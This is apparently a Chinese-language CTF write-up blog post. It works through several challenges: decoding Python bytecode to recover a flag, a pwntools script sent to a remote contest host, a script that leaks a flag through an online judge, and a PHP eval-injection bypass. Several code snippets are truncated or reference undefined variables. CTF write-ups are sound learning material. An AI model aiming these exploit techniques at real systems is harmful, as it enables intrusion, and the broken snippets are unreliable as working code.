• 欢迎光临~

# Reverse

## Easy_python ( 解法1 ）

### 题目大意：

``````  3           0 LOAD_CONST               1 (204)
126 BUILD_LIST              42
129 STORE_FAST               0 (flag)

4         132 SETUP_LOOP              54 (to 189)
141 CALL_FUNCTION            1
144 GET_ITER
>>  145 FOR_ITER                40 (to 188)
148 STORE_FAST               1 (i)

157 BINARY_SUBSCR
161 BINARY_RSHIFT
168 BINARY_SUBSCR
172 BINARY_LSHIFT
173 BINARY_OR
177 BINARY_AND
184 STORE_SUBSCR
185 JUMP_ABSOLUTE          145
>>  188 POP_BLOCK
192 RETURN_VALUE
``````

### 解题过程

dis — Disassembler for Python bytecode

``````GET_ITER
Implements TOS = iter(TOS).

BINARY_SUBSCR
Implements TOS = TOS1[TOS].

BINARY_LSHIFT
Implements TOS = TOS1 << TOS.

BINARY_RSHIFT
Implements TOS = TOS1 >> TOS.

BINARY_OR
Implements TOS = TOS1 | TOS.

BINARY_AND
Implements TOS = TOS1 & TOS.
``````

``````python -m dis ./XX.py
``````

``````flag = [204,141,44,236,111,140,140,76,44,172,7,7,39,165,70,7,39,166,165,134,134,140,204,165,7,39,230,140,165,70,44,172,102,6,140,204,230,230,76,198,38,175]
for i in range(42):
f1ag = ((flag[i] >> 5) | (flag[i] << 3 )) & 255
print(chr(f1ag),end="")
``````

## Easy_python ( 解法2 ）

(Chatgpt) 秒了。 （ 比赛结束后看大佬的 (Wp) 知道的，太神仙了www）

# Misc

## nan's analysis

(第一次见）

### 解题过程

``````list=[0,1,2,3,4,5,6,7,8,9]
for i in list:
for k in list:
for l in list:
print((str(i)+str(k)+str(i)+str(l))*4)
``````

php 解混淆

AES解密

# PWN

## work_pwn

### 解题过程

``````from pwn import *
context(arch="amd64",os="linux")
context.log_level = "debug"

io1 = remote('39.106.48.123',42877)

io1.sendline(str(3))
io1.sendline(str(1))
io1.recv()

sleep(0.1)
io1.sendline(str(1))
io1.sendline(str(1))
io1.recvuntil("Input Name : ")
io1.sendline(b'./flag'+2*b'x00')
sleep(1)
io1.recv()
``````

## Online_judge

(第一次见）

### 解题过程

(此题为赛后复现，被大佬指点）

``````import os
import sys
import requests
host,port = '47.104.129.38',10101
base_url = f'http://{host}:{port}'
token_url = f'{base_url}/getToken'
judge_url = f'{base_url}/judge'
def getToken():
result = requests.post(token_url).json()
#print(result)
assert not result['error'], "System error"
return result['data']['token']
def judge(chall:str, src:str, language:str = 'C'):
data = {
'src': src,
'language': language,
'action': chall,
'token': token,
}
result = requests.post(judge_url, json = data).json()
print(result)
return True
token = getToken()
print(token)

judge('test', py_src, 'PYTHON')
``````
``````flag = 'flag{'
for i in range(len(flag),100):
tail = 127
mid = (tail + head) << 1
else:
tail = mid
mid = (head + tail) >> 1
flag += chr(left)
info(flag)
if flag[-1] == "}":
break
print(flag)

``````

# Web

## ezphp

### 解题过程

``````<?php
highlight_file(__FILE__);
\$num = \$_GET['num'];
if(is_string(\$num) && strlen(\$num) < 5 && strpos(\$num,'111') === false && strpos(\$num,'0') === false && eval("return 111===\${num};")){    readfile('/flag');
}

?>
``````

``````因为return (111===1) or 1

``````